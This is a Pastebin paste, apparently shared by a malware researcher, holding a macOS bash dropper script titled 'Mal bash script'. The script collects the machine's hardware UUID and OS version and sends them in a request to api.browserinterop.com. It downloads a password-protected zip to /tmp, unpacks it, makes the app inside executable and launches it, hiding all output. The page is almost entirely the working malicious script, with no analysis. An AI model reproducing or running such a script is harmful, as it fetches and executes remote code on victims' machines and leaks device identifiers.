Advertisement
dissectmalware

Mal bash script - macOS

Sep 30th, 2018
599
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 0.87 KB | None | 0 0
  1. #!/bin/bash
  2. os_version="$(sw_vers -productVersion)"
  3. session_guid="$(uuidgen)"
  4. machine_id="$(echo -n "$(ioreg -rd1 -c IOPlatformExpertDevice | grep -o '"IOPlatformUUID" = "\(.*\)"' | sed -E -n 's@.*"([^"]+)"@\1@p')" | tr -dc '[[:print:]]')"
  5. url="http://api.browserinterop.com/sd/?c=42NybQ==&u=$machine_id&s=$session_guid&o=$os_version&b=4757508878"
  6. unzip_password="87880575746954757508878"
  7. tmp_path="$(mktemp /tmp/XXXXXXXXX)"
  8. curl -f0L "$url" >/dev/null 2>&1 >>$tmp_path
  9. app_dir="$(mktemp -d /tmp/XXXXXXXX)/"
  10. unzip -P "$unzip_password" "$tmp_path" -d "$app_dir" > /dev/null 2>&1
  11. rm -f $tmp_path
  12. file_name="$(grep -m1 -v "*.app" <(ls -1 "$app_dir"))"
  13. volume_name="$(echo -n "$PWD" | sed -E -n 's@^(/Volumes/[^/]+)/.*@\1@p')"
  14. volume_name="${volume_name// /%20}"
  15. chmod +x "$app_dir$file_name/Contents/MacOS"/*
  16. open -a "$app_dir$file_name" --args "s" "$session_guid" "$volume_name"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement